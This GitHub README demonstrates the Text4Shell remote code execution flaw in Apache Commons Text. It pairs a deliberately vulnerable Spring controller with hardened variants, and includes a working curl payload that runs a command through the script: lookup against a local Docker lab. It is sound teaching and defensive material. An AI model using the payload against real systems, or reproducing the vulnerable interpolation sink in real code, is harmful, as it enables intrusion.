sunnyvale-it/CVE-2022-42889-PoC

CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept


Text4Shell is the popular name of a critical vulnerability in the Apache Commons Text library (CVE-2022-42889). Versions 1.5 through 1.9 ship a StringSubstitutor interpolator whose default lookups include script:, dns: and url:, so any untrusted string that reaches the interpolator can trigger script execution, DNS requests or arbitrary URL fetches. Version 1.10.0 removes those three lookups from the defaults.

This repo is meant to demonstrate a Remote Code Execution (RCE) that leverages this CVE.

The vulnerable code is called from a Spring Boot controller, but don't get confused: this IS NOT a Spring Boot/Spring security issue. The sink is Commons Text's StringSubstitutor interpolation (e.g. StringSubstitutor.createInterpolator().replace(userInput)); any code that hands untrusted text to it is affected in the same way, with or without Spring.
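As an added example (not code from this repository), here is what such a controller looks like with the vulnerable sink beside two hardened variants. The class name, the /text4shell/safe and /text4shell/restricted routes and the allow-listed lookups are my own choices; the /text4shell/attack route and its search parameter mirror the curl command further down. It is written against commons-text 1.9 (the vulnerable path) and Spring Web, and needs Java 9+ for Map.of.

```java
import java.util.Map;

import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookupFactory;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

// Hypothetical controller written for this README; not the repo's own class.
@RestController
public class SearchController {

    // VULNERABLE (commons-text 1.5 to 1.9): createInterpolator() wires in the
    // default lookups, which include script:, dns: and url:. The raw query
    // string is used as the *template*, so "${script:javascript:...}" is handed
    // to the JVM's JavaScript engine and evaluated before the response is built.
    @GetMapping("/text4shell/attack")
    public String attack(@RequestParam("search") String search) {
        StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
        return "Search results for: " + interpolator.replace(search);
    }

    // HARDENED, option 1: never let user input be the template. The template is
    // an application-controlled constant and the user value is only a variable
    // *value* resolved from a Map, so no "prefix:" lookups exist at all.
    @GetMapping("/text4shell/safe")
    public String safe(@RequestParam("search") String search) {
        String template = "Search results for: ${query}";
        StringSubstitutor sub = new StringSubstitutor(Map.of("query", search));
        // Defence in depth: do not re-scan substituted values for ${...}.
        sub.setDisableSubstitutionInValues(true);
        return sub.replace(template);
    }

    // HARDENED, option 2: if interpolating user-controlled text is really
    // required, build the interpolator from an explicit allow-list of lookups
    // with addDefaultLookups=false, so script:/dns:/url: are simply absent.
    // Upgrading to commons-text 1.10.0 also drops those three from the defaults,
    // but an explicit allow-list documents the intent and survives downgrades.
    private static final StringSubstitutor RESTRICTED = new StringSubstitutor(
            StringLookupFactory.INSTANCE.interpolatorStringLookup(
                    Map.of("date", StringLookupFactory.INSTANCE.dateStringLookup()),
                    null,    // no default lookup for un-prefixed variables
                    false)); // do NOT add the default lookups

    @GetMapping("/text4shell/restricted")
    public String restricted(@RequestParam("search") String search) {
        // "${date:yyyy}" resolves; "${script:...}" has no matching lookup and
        // is returned unchanged instead of being executed.
        return "Search results for: " + RESTRICTED.replace(search);
    }
}
```

With this controller, the curl payload below produces the file in /tmp only through /text4shell/attack; the two other routes echo the ${script:...} text back verbatim.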

Before testing the RCE, build the Docker image:

$ docker build -t text4shell .
...
 => exporting to image                                                                                                                                                                                     0.0s
 => => exporting layers                                                                                                                                                                                    0.0s
 => => writing image sha256:5d82feaa030f5e7b35c1c6deaa12b40ef713c05001a41f5f71fff6174513507f                                                                                                               0.0s
 => => naming to docker.io/library/text4shell

Then run the container:

$ docker run --name text4shell --rm -ti -p 8080:8080 text4shell
...
2022-11-05 09:11:03.798  INFO 1 --- [           main] it.sunnyvale.text4shell.Main             : Started Main in 1.376 seconds (JVM running for 1.713)

You can finally try to exploit the vulnerable application with a specially crafted URL. The search parameter is the URL-encoded form of ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/p0wned')}; Commons Text's script: lookup passes the JavaScript to the JVM's script engine, which in turn calls Runtime.exec:

$ curl http://localhost:8080/text4shell/attack\?search\=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Fp0wned%27%29%7D
Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/p0wned')}

If you find a file named p0wned in the container's /tmp directory, the RCE executed successfully. Note that the script: lookup needs a JSR-223 JavaScript engine inside the JVM: Nashorn is bundled with JDK 8 through 14 and was removed in JDK 15, so on a newer JDK this exact payload silently fails unless an engine (standalone Nashorn, GraalJS) is on the classpath. The dns: and url: lookups do not depend on a script engine and remain usable for DNS-based exfiltration and server-side requests.

$ docker exec text4shell ls -l /tmp/p0wned
-rw-r--r--    1 root     root             0 Nov  5 09:17 /tmp/p0wned

Scanning the image with docker scan (backed by Snyk) detects the vulnerable library and reports the fixed version:

$ docker scan text4shell | grep text
Testing text4shell...
Project name:      docker-image|text4shell
Docker image:      text4shell
Testing text4shell...
Upgrade org.apache.commons:[email protected] to org.apache.commons:[email protected] to fix
✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:[email protected]
introduced by org.apache.commons:[email protected]
Upgrade org.springframework:[email protected] to org.springframework:[email protected] to fix
✗ Improper Handling of Case Sensitivity [Low Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634] in org.springframework:[email protected]
introduced by org.springframework:[email protected]
Project name:      text4shell:latest:/app
Docker image:      text4shell
